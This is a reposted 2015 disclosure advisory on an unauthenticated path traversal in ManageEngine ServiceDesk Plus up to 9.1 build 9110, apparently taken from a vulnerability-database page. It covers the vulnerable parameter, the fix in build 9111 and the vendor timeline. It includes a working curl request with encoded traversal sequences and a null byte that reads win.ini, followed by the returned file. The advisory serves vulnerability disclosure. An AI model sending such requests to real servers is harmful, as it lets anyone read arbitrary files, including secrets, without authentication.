ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1041163 漏洞类型
发布时间 2015-10-05 更新时间 2015-10-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015100031
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence <xistence[at]0x90.nl>
 
Product Description
-------------------
 
ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.
 
 
Vulnerability Details
---------------------
 
The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.
 
The following example will download the "win.ini" file:
 
$ curl "
http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
 
 
Solution
--------
 
Upgrade to ServiceDesk 9.1 build 9111.
 
 
Advisory Timeline
-----------------
 
07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responsed that they will notify their development team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure